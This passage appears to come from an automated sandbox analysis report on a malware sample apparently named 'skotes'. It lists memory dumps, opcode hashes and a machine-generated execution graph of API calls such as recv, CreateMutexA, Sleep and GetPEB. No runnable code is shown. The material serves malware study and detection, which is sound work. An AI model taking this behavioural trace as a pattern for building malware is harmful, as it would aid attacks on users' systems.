                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Mtx_unlock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1418687624-0
                                                                                                                                                                                                                                                              • Opcode ID: e01cb01ad53452e23bb0bf032051fdf9bd0ac723b4240d9b955777e220304ac1
                                                                                                                                                                                                                                                              • Instruction ID: 36c64e9f61626635e577c28db3316d81de933305ab451aba2af971967b39d51e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e01cb01ad53452e23bb0bf032051fdf9bd0ac723b4240d9b955777e220304ac1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23A1C170A056059FDB20DBB4C945B9BB7E8FF1A318F145129F815FB251EB31EA04CB91

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                                              Total number of Nodes:596
                                                                                                                                                                                                                                                              Total number of Limit Nodes:4
                                                                                                                                                                                                                                                              execution_graph 9670 ed6629 9673 ed64c7 9670->9673 9674 ed64d5 __cftof 9673->9674 9675 ed6520 9674->9675 9678 ed652b 9674->9678 9677 ed652a 9684 eda302 GetPEB 9678->9684 9680 ed6535 9681 ed653a GetPEB 9680->9681 9683 ed654a __cftof 9680->9683 9681->9683 9682 ed6562 ExitProcess 9683->9682 9685 eda31c __cftof 9684->9685 9685->9680 10084 ea5cad 10086 ea5caf shared_ptr __cftof 10084->10086 10085 ea5d17 shared_ptr std::future_error::future_error 10086->10085 10087 ea5c10 3 API calls 10086->10087 10088 ea66ac 10087->10088 10089 ea5c10 3 API calls 10088->10089 10090 ea66b1 10089->10090 10091 ea22c0 3 API calls 10090->10091 10092 ea66c9 shared_ptr 10091->10092 10093 ea5c10 3 API calls 10092->10093 10094 ea673d 10093->10094 10095 ea22c0 3 API calls 10094->10095 10097 ea6757 shared_ptr 10095->10097 10096 ea5c10 3 API calls 10096->10097 10097->10096 10098 ea22c0 3 API calls 10097->10098 10099 ea6852 shared_ptr std::future_error::future_error 10097->10099 10098->10097 10100 ea20a0 10101 ebc68b __Mtx_init_in_situ 2 API calls 10100->10101 10102 ea20ac 10101->10102 10268 ea3fe0 10269 ea4022 10268->10269 10270 ea408c 10269->10270 10271 ea40d2 10269->10271 10274 ea4035 std::future_error::future_error 10269->10274 10275 ea35e0 10270->10275 10281 ea3ee0 10271->10281 10276 ea3616 10275->10276 10280 ea364e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 10276->10280 10287 ea2ce0 10276->10287 10278 ea369e 10278->10280 10296 ea2c00 10278->10296 10280->10274 10282 ea3f1e 10281->10282 10284 ea3f48 10281->10284 10282->10274 10283 ea3f58 10283->10274 10284->10283 10285 ea2c00 3 API calls 10284->10285 10286 ea3f7f 10285->10286 10286->10274 10288 ea2d1d 10287->10288 10289 ebbedf InitOnceExecuteOnce 10288->10289 10290 ea2d46 10289->10290 10291 ea2d51 std::future_error::future_error 10290->10291 10292 ea2d88 10290->10292 10303 ebbef7 10290->10303 10291->10278 10294 ea2440 3 API calls 10292->10294 10295 ea2d9b 10294->10295 10295->10278 10297 ea2c0e 10296->10297 10316 ebb847 10297->10316 10299 ea2c42 10300 ea2c49 10299->10300 10322 ea2c80 10299->10322 10300->10280 10302 ea2c58 Concurrency::cancel_current_task 10304 ebbf03 Concurrency::cancel_current_task 10303->10304 10305 ebbf6a 10304->10305 10306 ebbf73 10304->10306 10310 ebbe7f 10305->10310 10307 ea2ae0 4 API calls 10306->10307 10309 ebbf6f 10307->10309 10309->10292 10311 ebcc31 InitOnceExecuteOnce 10310->10311 10312 ebbe97 10311->10312 10313 ebbe9e 10312->10313 10314 ed6cbb 3 API calls 10312->10314 10313->10309 10315 ebbea7 10314->10315 10315->10309 10317 ebb854 10316->10317 10321 ebb873 Concurrency::details::_Reschedule_chore 10316->10321 10325 ebcb77 10317->10325 10319 ebb864 10319->10321 10327 ebb81e 10319->10327 10321->10299 10333 ebb7fb 10322->10333 10324 ea2cb2 shared_ptr 10324->10302 10326 ebcb92 CreateThreadpoolWork 10325->10326 10326->10319 10328 ebb827 Concurrency::details::_Reschedule_chore 10327->10328 10331 ebcdcc 10328->10331 10330 ebb841 10330->10321 10332 ebcde1 TpPostWork 10331->10332 10332->10330 10334 ebb807 10333->10334 10336 ebb817 10333->10336 10334->10336 10337 ebca78 10334->10337 10336->10324 10338 ebca8d TpReleaseWork 10337->10338 10338->10336 10424 ea4120 10425 ea416a 10424->10425 10426 ea41b2 std::future_error::future_error 10425->10426 10427 ea3ee0 3 API calls 10425->10427 10427->10426 10354 ea9ba5 10355 ea9ba7 10354->10355 10356 ea5c10 3 API calls 10355->10356 10357 ea9cb1 10356->10357 10358 ea8b30 3 API calls 10357->10358 10359 ea9cc2 10358->10359 10103 ea9ab8 10105 ea9acc 10103->10105 10106 ea9b08 10105->10106 10107 ea5c10 3 API calls 10106->10107 10108 ea9b7c 10107->10108 10109 ea8b30 3 API calls 10108->10109 10110 ea9b8d 10109->10110 10111 ea5c10 3 API calls 10110->10111 10112 ea9cb1 10111->10112 10113 ea8b30 3 API calls 10112->10113 10114 ea9cc2 10113->10114 10221 eacc79 10223 eacc84 shared_ptr 10221->10223 10222 eaccda shared_ptr std::future_error::future_error 10223->10222 10224 ea5c10 3 API calls 10223->10224 10225 eace9d 10224->10225 10227 eaca70 10225->10227 10228 eacadd 10227->10228 10230 ea5c10 3 API calls 10228->10230 10234 eacc87 10228->10234 10229 eaccda shared_ptr std::future_error::future_error 10231 eaccf9 10230->10231 10237 ea9030 10231->10237 10233 ea5c10 3 API calls 10235 eace9d 10233->10235 10234->10229 10234->10233 10236 eaca70 3 API calls 10235->10236 10238 ea9080 10237->10238 10239 ea5c10 3 API calls 10238->10239 10240 ea909a shared_ptr std::future_error::future_error 10239->10240 10240->10234 10360 ed8bbe 10361 ed8868 3 API calls 10360->10361 10362 ed8bdc 10361->10362 10115 ea42b0 10118 ea3ac0 10115->10118 10117 ea42bb shared_ptr 10119 ea3af9 10118->10119 10122 ea3c38 10119->10122 10124 ea3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10119->10124 10128 ea32d0 10119->10128 10121 ea32d0 5 API calls 10125 ea3c5f 10121->10125 10122->10121 10122->10125 10123 ea3c68 10123->10117 10124->10117 10125->10123 10145 ea3810 10125->10145 10129 ebc6ac GetSystemTimePreciseAsFileTime 10128->10129 10132 ea3314 10129->10132 10130 ebc26a 4 API calls 10131 ea333c __Mtx_unlock 10130->10131 10133 ebc26a 4 API calls 10131->10133 10134 ea3350 std::future_error::future_error 10131->10134 10132->10130 10132->10131 10135 ea3377 10133->10135 10134->10122 10136 ebc6ac GetSystemTimePreciseAsFileTime 10135->10136 10137 ea33af 10136->10137 10138 ebc26a 4 API calls 10137->10138 10139 ea33b6 10137->10139 10138->10139 10140 ebc26a 4 API calls 10139->10140 10141 ea33d7 __Mtx_unlock 10139->10141 10140->10141 10142 ebc26a 4 API calls 10141->10142 10143 ea33eb 10141->10143 10144 ea340e 10142->10144 10143->10122 10144->10122 10146 ea381c 10145->10146 10149 ea2440 10146->10149 10152 ebb5d6 10149->10152 10151 ea2472 10153 ebb5f1 Concurrency::cancel_current_task 10152->10153 10154 ed8bec __cftof 3 API calls 10153->10154 10156 ebb658 __cftof std::future_error::future_error 10153->10156 10155 ebb69f 10154->10155 10156->10151 10339 ea55f0 10340 ea5610 10339->10340 10341 ea22c0 3 API calls 10340->10341 10342 ea5710 std::future_error::future_error 10340->10342 10341->10340 10343 ea43f0 10344 ebbedf InitOnceExecuteOnce 10343->10344 10345 ea440a 10344->10345 10346 ea4411 10345->10346 10347 ed6cbb 3 API calls 10345->10347 10348 ea4424 10347->10348 10375 ea3970 10376 ebc68b __Mtx_init_in_situ 2 API calls 10375->10376 10377 ea39a7 10376->10377 10378 ebc68b __Mtx_init_in_situ 2 API calls 10377->10378 10379 ea39e6 10378->10379 10380 ea2170 10383 ebc6fc 10380->10383 10382 ea217a 10385 ebc70c 10383->10385 10386 ebc724 10383->10386 10385->10386 10387 ebcfbe 10385->10387 10386->10382 10388 ebccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10387->10388 10389 ebcfd0 10388->10389 10389->10385 9691 eb9ef0 9692 eb9f0c 9691->9692 9695 ebc68b 9692->9695 9694 eb9f17 9698 ebc3d5 9695->9698 9697 ebc69b 9697->9694 9699 ebc3e1 9698->9699 9700 ebc3eb 9698->9700 9701 ebc3be 9699->9701 9703 ebc39e 9699->9703 9700->9697 9711 ebcd0a 9701->9711 9703->9700 9707 ebccd5 9703->9707 9704 ebc3d0 9704->9697 9708 ebcce3 InitializeCriticalSectionEx 9707->9708 9710 ebc3b7 9707->9710 9708->9710 9710->9697 9712 ebcd1f RtlInitializeConditionVariable 9711->9712 9712->9704 10241 ea4276 10242 ea2410 4 API calls 10241->10242 10243 ea427f 10242->10243 10157 ea3c8e 10158 ea3c98 10157->10158 10160 ea3ca5 10158->10160 10165 ea2410 10158->10165 10161 ea3810 3 API calls 10160->10161 10162 ea3ccf 10161->10162 10163 ea3810 3 API calls 10162->10163 10164 ea3cdb shared_ptr 10163->10164 10166 ea2424 10165->10166 10169 ebb52d 10166->10169 10177 ed3aed 10169->10177 10171 ea242a 10171->10160 10172 ebb5a5 ___std_exception_copy 10184 ebb1ad 10172->10184 10173 ebb598 10180 ebaf56 10173->10180 10188 ed4f29 10177->10188 10179 ebb555 10179->10171 10179->10172 10179->10173 10181 ebaf9f ___std_exception_copy 10180->10181 10183 ebafb2 shared_ptr 10181->10183 10194 ebb39f 10181->10194 10183->10171 10185 ebb1d8 10184->10185 10187 ebb1e1 shared_ptr 10184->10187 10186 ebb39f 4 API calls 10185->10186 10186->10187 10187->10171 10189 ed4f2e __cftof 10188->10189 10189->10179 10190 edd634 __cftof 3 API calls 10189->10190 10193 ed8bfc __cftof 10189->10193 10190->10193 10191 ed65ed __cftof 3 API calls 10192 ed8c2f 10191->10192 10193->10191 10195 ebbedf InitOnceExecuteOnce 10194->10195 10196 ebb3e1 10195->10196 10197 ebb3e8 10196->10197 10205 ed6cbb 10196->10205 10197->10183 10206 ed6cc7 __dosmaperr 10205->10206 10207 eda671 __cftof 3 API calls 10206->10207 10210 ed6ccc 10207->10210 10208 ed8bec __cftof 3 API calls 10209 ed6cf6 10208->10209 10210->10208 10244 ed6a44 10245 ed6a5c 10244->10245 10246 ed6a52 10244->10246 10249 ed698d 10245->10249 10248 ed6a76 __freea 10250 ed690a __cftof 3 API calls 10249->10250 10251 ed699f 10250->10251 10251->10248 9716 eae0c0 recv 9717 eae122 recv 9716->9717 9718 eae157 recv 9717->9718 9720 eae191 9718->9720 9719 eae2b3 std::future_error::future_error 9720->9719 9725 ebc6ac 9720->9725 9732 ebc452 9725->9732 9727 eae2ee 9728 ebc26a 9727->9728 9729 ebc292 9728->9729 9730 ebc274 9728->9730 9729->9729 9730->9729 9749 ebc297 9730->9749 9733 ebc4a8 9732->9733 9735 ebc47a std::future_error::future_error 9732->9735 9733->9735 9738 ebcf6b 9733->9738 9735->9727 9736 ebc4fd __Xtime_diff_to_millis2 9736->9735 9737 ebcf6b _xtime_get GetSystemTimePreciseAsFileTime 9736->9737 9737->9736 9739 ebcf7a 9738->9739 9741 ebcf87 __aulldvrm 9738->9741 9739->9741 9742 ebcf44 9739->9742 9741->9736 9745 ebcbea 9742->9745 9746 ebcbfb GetSystemTimePreciseAsFileTime 9745->9746 9747 ebcc07 9745->9747 9746->9747 9747->9741 9752 ea2ae0 9749->9752 9751 ebc2ae Concurrency::cancel_current_task 9759 ebbedf 9752->9759 9754 ea2af4 __dosmaperr 9754->9751 9762 eda671 9754->9762 9773 ebcc31 9759->9773 9766 eda67b __dosmaperr __freea 9762->9766 9763 ed6ccc 9767 ed8bec 9763->9767 9764 ed8bec __cftof 3 API calls 9765 eda72d 9764->9765 9766->9763 9766->9764 9768 ed8bf1 __cftof 9767->9768 9772 ed8bfc __cftof 9768->9772 9777 edd634 9768->9777 9791 ed65ed 9772->9791 9774 ebcc3f InitOnceExecuteOnce 9773->9774 9776 ebbef2 9773->9776 9774->9776 9776->9754 9779 edd640 __cftof __dosmaperr 9777->9779 9778 edd69c __cftof __dosmaperr 9778->9772 9779->9778 9780 edd81b __dosmaperr 9779->9780 9781 edd726 9779->9781 9783 edd751 __cftof 9779->9783 9782 ed65ed __cftof 3 API calls 9780->9782 9781->9783 9794 edd62b 9781->9794 9784 edd82e 9782->9784 9783->9778 9786 eda671 __cftof 3 API calls 9783->9786 9789 edd7a5 9783->9789 9786->9789 9788 edd62b __cftof 3 API calls 9788->9783 9789->9778 9790 eda671 __cftof 3 API calls 9789->9790 9790->9778 9792 ed64c7 __cftof 3 API calls 9791->9792 9793 ed65fe 9792->9793 9795 eda671 __cftof 3 API calls 9794->9795 9796 edd630 9795->9796 9796->9788 9797 ea2ec0 9798 ea2f06 9797->9798 9802 ea2f6f 9797->9802 9799 ebc6ac GetSystemTimePreciseAsFileTime 9798->9799 9800 ea2f12 9799->9800 9803 ea301e 9800->9803 9807 ea2f1d __Mtx_unlock 9800->9807 9801 ea2fef 9802->9801 9808 ebc6ac GetSystemTimePreciseAsFileTime 9802->9808 9804 ebc26a 4 API calls 9803->9804 9805 ea3024 9804->9805 9806 ebc26a 4 API calls 9805->9806 9809 ea2fb9 9806->9809 9807->9802 9807->9805 9808->9809 9810 ebc26a 4 API calls 9809->9810 9811 ea2fc0 __Mtx_unlock 9809->9811 9810->9811 9812 ebc26a 4 API calls 9811->9812 9813 ea2fd8 9811->9813 9812->9813 9813->9801 9814 ebc26a 4 API calls 9813->9814 9815 ea303c 9814->9815 9816 ebc6ac GetSystemTimePreciseAsFileTime 9815->9816 9819 ea3080 shared_ptr __Mtx_unlock 9816->9819 9817 ea315f 9818 ebc26a 4 API calls 9817->9818 9822 ea31d1 9817->9822 9828 ea3193 __Mtx_unlock 9817->9828 9820 ea31cb 9818->9820 9819->9817 9819->9820 9824 ea31a7 std::future_error::future_error 9819->9824 9827 ebc6ac GetSystemTimePreciseAsFileTime 9819->9827 9821 ebc26a 4 API calls 9820->9821 9821->9822 9823 ebc26a 4 API calls 9822->9823 9823->9828 9825 ebc26a 4 API calls 9826 ea31dd 9825->9826 9827->9817 9828->9824 9828->9825 10259 ea2e00 10260 ea2e28 10259->10260 10261 ebc68b __Mtx_init_in_situ 2 API calls 10260->10261 10262 ea2e33 10261->10262 10363 ea8980 10365 ea8aea 10363->10365 10366 ea89d8 shared_ptr 10363->10366 10364 ea5c10 3 API calls 10364->10366 10366->10364 10366->10365 9829 ebd0c7 9831 ebd0d7 9829->9831 9830 ebd17f 9831->9830 9832 ebd17b RtlWakeAllConditionVariable 9831->9832 10252 ea3c47 10253 ea3c51 10252->10253 10255 ea32d0 5 API calls 10253->10255 10256 ea3c5f 10253->10256 10254 ea3c68 10255->10256 10256->10254 10257 ea3810 3 API calls 10256->10257 10258 ea3cdb shared_ptr 10257->10258 10416 ea9f44 10417 ea9f4c shared_ptr 10416->10417 10418 eaa953 Sleep CreateMutexA 10417->10418 10419 eaa01f shared_ptr 10417->10419 10420 eaa98e 10418->10420 10421 ea215a 10422 ebc6fc InitializeCriticalSectionEx 10421->10422 10423 ea2164 10422->10423 10367 ea3f9f 10368 ea3fad 10367->10368 10369 ea3fb6 10367->10369 10370 ea2410 4 API calls 10368->10370 10370->10369 9833 ea9adc 9834 ea9aea 9833->9834 9838 ea9afe shared_ptr 9833->9838 9835 eaa917 9834->9835 9834->9838 9836 eaa953 Sleep CreateMutexA 9835->9836 9837 eaa98e 9836->9837 9847 ea5c10 9838->9847 9840 ea9b7c 9865 ea8b30 9840->9865 9842 ea9b8d 9843 ea5c10 3 API calls 9842->9843 9844 ea9cb1 9843->9844 9845 ea8b30 3 API calls 9844->9845 9846 ea9cc2 9845->9846 9848 ea5c54 9847->9848 9875 ea4b30 9848->9875 9850 ea5d17 shared_ptr std::future_error::future_error 9850->9840 9851 ea5c7b shared_ptr __cftof 9851->9850 9852 ea5c10 3 API calls 9851->9852 9853 ea66ac 9852->9853 9854 ea5c10 3 API calls 9853->9854 9855 ea66b1 9854->9855 9879 ea22c0 9855->9879 9857 ea66c9 shared_ptr 9858 ea5c10 3 API calls 9857->9858 9859 ea673d 9858->9859 9860 ea22c0 3 API calls 9859->9860 9862 ea6757 shared_ptr 9860->9862 9861 ea5c10 3 API calls 9861->9862 9862->9861 9863 ea22c0 3 API calls 9862->9863 9864 ea6852 shared_ptr std::future_error::future_error 9862->9864 9863->9862 9864->9840 9866 ea8b7c 9865->9866 9867 ea5c10 3 API calls 9866->9867 9869 ea8b97 shared_ptr 9867->9869 9868 ea8d01 shared_ptr std::future_error::future_error 9868->9842 9869->9868 9870 ea5c10 3 API calls 9869->9870 9872 ea8d9a shared_ptr 9870->9872 9871 ea8e7e shared_ptr std::future_error::future_error 9871->9842 9872->9871 9873 ea5c10 3 API calls 9872->9873 9874 ea8f1a shared_ptr std::future_error::future_error 9873->9874 9874->9842 9876 ea4b92 9875->9876 9878 ea4ce5 9875->9878 9876->9878 9882 ed6da6 9876->9882 9878->9851 9968 ea2280 9879->9968 9883 ed6db4 9882->9883 9885 ed6dc2 9882->9885 9887 ed6d19 9883->9887 9885->9876 9892 ed690a 9887->9892 9891 ed6d3d 9891->9876 9893 ed692a 9892->9893 9899 ed6921 9892->9899 9894 eda671 __cftof 3 API calls 9893->9894 9893->9899 9895 ed694a 9894->9895 9906 edb5fb 9895->9906 9900 ed6d52 9899->9900 9901 ed6d8f 9900->9901 9902 ed6d5f 9900->9902 9960 edb67d 9901->9960 9904 ed6d6e 9902->9904 9955 edb6a1 9902->9955 9904->9891 9907 edb60e 9906->9907 9908 ed6960 9906->9908 9907->9908 9914 edf5ab 9907->9914 9910 edb628 9908->9910 9911 edb63b 9910->9911 9913 edb650 9910->9913 9911->9913 9921 ede6b1 9911->9921 9913->9899 9915 edf5b7 __dosmaperr 9914->9915 9916 eda671 __cftof 3 API calls 9915->9916 9918 edf5c0 __cftof __dosmaperr 9916->9918 9917 edf606 9917->9908 9918->9917 9919 ed8bec __cftof 3 API calls 9918->9919 9920 edf62b 9919->9920 9922 eda671 __cftof 3 API calls 9921->9922 9923 ede6bb 9922->9923 9926 ede5c9 9923->9926 9925 ede6c1 9925->9913 9927 ede5d5 __cftof __dosmaperr __freea 9926->9927 9928 ede5f6 9927->9928 9929 ed8bec __cftof 3 API calls 9927->9929 9928->9925 9930 ede668 9929->9930 9931 ede6a4 9930->9931 9935 eda72e 9930->9935 9931->9925 9939 eda739 __dosmaperr __freea 9935->9939 9936 ed8bec __cftof 3 API calls 9937 eda7c7 9936->9937 9938 eda7be 9940 ede4b0 9938->9940 9939->9936 9939->9938 9941 ede5c9 __cftof 3 API calls 9940->9941 9942 ede4c3 9941->9942 9947 ede259 9942->9947 9944 ede4cb __cftof 9946 ede4dc __cftof __dosmaperr __freea 9944->9946 9950 ede6c4 9944->9950 9946->9931 9948 ed690a __cftof GetPEB ExitProcess GetPEB 9947->9948 9949 ede26b 9948->9949 9949->9944 9951 ede259 __cftof GetPEB ExitProcess GetPEB 9950->9951 9954 ede6e4 __cftof 9951->9954 9952 ede75a __cftof std::future_error::future_error 9952->9946 9953 ede32f __cftof GetPEB ExitProcess GetPEB 9953->9952 9954->9952 9954->9953 9956 ed690a __cftof 3 API calls 9955->9956 9957 edb6be 9956->9957 9959 edb6ce std::future_error::future_error 9957->9959 9965 edf1bf 9957->9965 9959->9904 9961 eda671 __cftof 3 API calls 9960->9961 9962 edb688 9961->9962 9963 edb5fb __cftof 3 API calls 9962->9963 9964 edb698 9963->9964 9964->9904 9966 ed690a __cftof 3 API calls 9965->9966 9967 edf1df __cftof __freea std::future_error::future_error 9966->9967 9967->9959 9969 ea2296 9968->9969 9972 ed87f8 9969->9972 9975 ed7609 9972->9975 9974 ea22a4 9974->9857 9976 ed7649 9975->9976 9980 ed7631 __cftof __dosmaperr std::future_error::future_error 9975->9980 9977 ed690a __cftof 3 API calls 9976->9977 9976->9980 9978 ed7661 9977->9978 9981 ed7bc4 9978->9981 9980->9974 9983 ed7bd5 9981->9983 9982 ed7be4 __cftof __dosmaperr 9982->9980 9983->9982 9988 ed8168 9983->9988 9993 ed7dc2 9983->9993 9998 ed7de8 9983->9998 10008 ed7f36 9983->10008 9989 ed8178 9988->9989 9990 ed8171 9988->9990 9989->9983 10017 ed7b50 9990->10017 9992 ed8177 9992->9983 9994 ed7dcb 9993->9994 9996 ed7dd2 9993->9996 9995 ed7b50 3 API calls 9994->9995 9997 ed7dd1 9995->9997 9996->9983 9997->9983 9999 ed7e09 __cftof __dosmaperr 9998->9999 10000 ed7def 9998->10000 9999->9983 10000->9999 10001 ed7f69 10000->10001 10003 ed7fa2 10000->10003 10006 ed7f77 10000->10006 10001->10006 10007 ed7f8b 10001->10007 10035 ed8241 10001->10035 10003->10007 10031 ed8390 10003->10031 10006->10007 10039 ed86ea 10006->10039 10007->9983 10009 ed7f69 10008->10009 10012 ed7f4f 10008->10012 10011 ed7f8b 10009->10011 10013 ed8241 3 API calls 10009->10013 10015 ed7f77 10009->10015 10010 ed7fa2 10010->10011 10014 ed8390 3 API calls 10010->10014 10011->9983 10012->10009 10012->10010 10012->10015 10013->10015 10014->10015 10015->10011 10016 ed86ea 3 API calls 10015->10016 10016->10011 10018 ed7b62 __dosmaperr 10017->10018 10021 ed8ab6 10018->10021 10020 ed7b85 __dosmaperr 10020->9992 10022 ed8ad1 10021->10022 10025 ed8868 10022->10025 10024 ed8adb 10024->10020 10026 ed887a 10025->10026 10027 ed690a __cftof GetPEB ExitProcess GetPEB 10026->10027 10028 ed888f __cftof __dosmaperr 10026->10028 10030 ed88bf 10027->10030 10028->10024 10029 ed6d52 GetPEB ExitProcess GetPEB 10029->10030 10030->10028 10030->10029 10033 ed83ab 10031->10033 10032 ed83dd 10032->10006 10033->10032 10043 edc88e 10033->10043 10036 ed825a 10035->10036 10050 edd3c8 10036->10050 10038 ed830d 10038->10006 10038->10038 10040 ed875d std::future_error::future_error 10039->10040 10042 ed8707 10039->10042 10040->10007 10041 edc88e __cftof 3 API calls 10041->10042 10042->10040 10042->10041 10046 edc733 10043->10046 10045 edc8a6 10045->10032 10047 edc743 10046->10047 10048 ed690a __cftof GetPEB ExitProcess GetPEB 10047->10048 10049 edc748 __cftof __dosmaperr 10047->10049 10048->10049 10049->10045 10053 edd3ee 10050->10053 10062 edd3d8 __cftof __dosmaperr 10050->10062 10051 edd485 10055 edd4ae 10051->10055 10056 edd4e4 10051->10056 10052 edd48a 10063 edcbdf 10052->10063 10053->10051 10053->10052 10053->10062 10058 edd4cc 10055->10058 10059 edd4b3 10055->10059 10080 edcef8 10056->10080 10076 edd0e2 10058->10076 10069 edd23e 10059->10069 10062->10038 10064 edcbf1 10063->10064 10065 ed690a __cftof GetPEB ExitProcess GetPEB 10064->10065 10066 edcc05 10065->10066 10067 edcef8 GetPEB ExitProcess GetPEB 10066->10067 10068 edcc0d __alldvrm __cftof __dosmaperr _strrchr 10066->10068 10067->10068 10068->10062 10072 edd26c 10069->10072 10070 edd2a5 10070->10062 10071 edd2de 10073 edcf9a GetPEB ExitProcess GetPEB 10071->10073 10072->10070 10072->10071 10074 edd2b7 10072->10074 10073->10070 10075 edd16d GetPEB ExitProcess GetPEB 10074->10075 10075->10070 10077 edd10f 10076->10077 10078 edd16d GetPEB ExitProcess GetPEB 10077->10078 10079 edd14e 10077->10079 10078->10079 10079->10062 10081 edcf10 10080->10081 10082 edcf75 10081->10082 10083 edcf9a GetPEB ExitProcess 